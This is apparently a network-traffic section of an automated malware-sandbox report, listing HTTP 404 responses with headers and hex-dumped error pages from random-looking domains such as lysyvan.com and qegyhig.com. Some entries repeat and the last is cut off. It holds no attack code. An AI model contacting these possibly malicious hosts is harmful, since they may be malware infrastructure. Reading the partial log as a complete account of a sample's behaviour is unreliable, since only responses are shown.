Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="57.6",amp_style_sanitizer;dur="24.5",amp_tag_and_attribute_sanitizer;dur="26.8",amp_optimizer;dur="24.6"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucylzZkDHjuy5%2FhNaZ6Y2Glc6ThAgjJBg0bsoarZbtCCcEKPa1vPwTSYd3kUNHfaXP7Xz3Ra8EZ8WK%2BC3tVRPcDMHsUI3Wti%2FbZM38KY%2B6haEAMaCIIaujl3GOIBgg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe9374e20eb7f-SEAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=60390&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=47939&cwnd=32&unsent_bytes=0&cid=cd3b4c6f53ab7a2b&ts=1740&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="163.0",amp_style_sanitizer;dur="96.1",amp_tag_and_attribute_sanitizer;dur="52.7",amp_optimizer;dur="50.0"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjYob1fC0Ti83h2e1HNsSkdt0G%2FzptS9nuUYCs1%2FlUO%2F%2B0o6FuYZI9ql28qeoFMtzHvPGk7%2F9H0oYcXSMLlSwdWnXT0EC%2F0%2FD9uhxEJeX1cywuudg%2FlrCKFeT5yMDg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe94729590f42-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1329&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=2234567&cwnd=251&unsent_bytes=0&cid=5cece37b9fce5940&ts=2681&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvpImHCud93VN07eo%2Fg3C8Y2bLsLwbz3ajSz%2Fq9w%2FonNmY%2FQub5UF5wBsmhxE6qFFnGlBrgjo3%2BCkDEHS8ibuMfO%2FbzvSUvG%2BGSWzfpYELI7zQ8I9GcvTygCGjj%2BrA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe9b118750f3d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1204&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2569653&cwnd=247&unsent_bytes=0&cid=7bcaf66820f6c30d&ts=845&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKlsR995DzG5lUgNDN%2B8RMuWE4k5DSE0%2FlC2pJe2wazBm4c8FVZRP0RrmsYYdCFEWFnmHUyzmzjbD4KZXNzzhRAWRk4gTlO8XpyXuQ8tUWQ6hDamt5GyzG8xkj06bQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe9bbab36a2af-YULalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=11807&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=245215&cwnd=32&unsent_bytes=0&cid=fa2a4285b92977dd&ts=1318&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="48.9",amp_style_sanitizer;dur="21.9",amp_tag_and_attribute_sanitizer;dur="20.8",amp_optimizer;dur="23.6"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2bCc39d1Mt%2BpiwYAxEUM7BMb4FcwLsdFhAgMByRiwFC%2Bvk4MNUIPv9%2B5du1pJQR3574nSY14Z7%2FOmRZ7Ibu47H0mtdowYxVj2dKafznL6hI%2FHuV2QF%2BX9zKc7GuUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe9cd1e218099-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=154798&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=18726&cwnd=32&unsent_bytes=0&cid=790987abbe807eb3&ts=1691&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="41.6",amp_style_sanitizer;dur="16.6",amp_tag_and_attribute_sanitizer;dur="19.0",amp_optimizer;dur="23.0"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BtLlicqq7lwrcabfKo41kf1arEExdlQf0CCUzJJJCa1NYQzQ3I9zQTU3Nxa8FFv4wLTukG5zPhEhmpSodxeuIaTC4NxUBhFE0L3RpV%2Flt2x%2BvjuzLBqtg3NmsHORaQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fe9db09718c6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1457&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1983561&cwnd=250&unsent_bytes=0&cid=2cd5e7095c09ced0&ts=2640&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:13:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5CbZyqIewK0BXTil6DYd6vHzigsUrto13tlOGyHMuE1a7PUCQuWg1%2BaQiVM6aUUzL%2B%2BwNl9Ro6gU4Hd6Ma1439se%2BidLwh%2B%2BA3SCQlUdVwaNLi9N%2FRFOzAQc7pCIhg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fea03ce1318d0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1281&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2229407&cwnd=247&unsent_bytes=0&cid=d725e913d631f272&ts=1633&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:14:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9quUcSnzFdcUmfd2mbO63LzbjtdwP%2FA%2BNFIUy53owkibGaTEiYWGwWpW1wmV5i%2BLjQfUlzFIuRXTIGMEtgm7ZHPHx%2Bh3%2FiLHwVuf6iJKK%2FzhE2n4v6PKFswIyMjQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0febd8e9074207-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1334&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2212375&cwnd=251&unsent_bytes=0&cid=b4829b0539e980e1&ts=960&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:15:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="98.7",amp_style_sanitizer;dur="39.3",amp_tag_and_attribute_sanitizer;dur="53.1",amp_optimizer;dur="43.4"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IgXC5%2FgmcNKoz3cZ%2Fxruf1nNNG0vczf2IMFmqMdUrBuwMsf0ojHasIJTLGDCbfzyHH%2BVCSuthV9BI9eaXthLmOnsyu3TYPd3n%2BjLzk7UTwu2IQFjlsrNtPO8WDFSoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0fec04eba94401-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1798&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=1597352&cwnd=251&unsent_bytes=0&cid=5258a3b7d38dbd6c&ts=3137&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:12:56 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:12:56 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 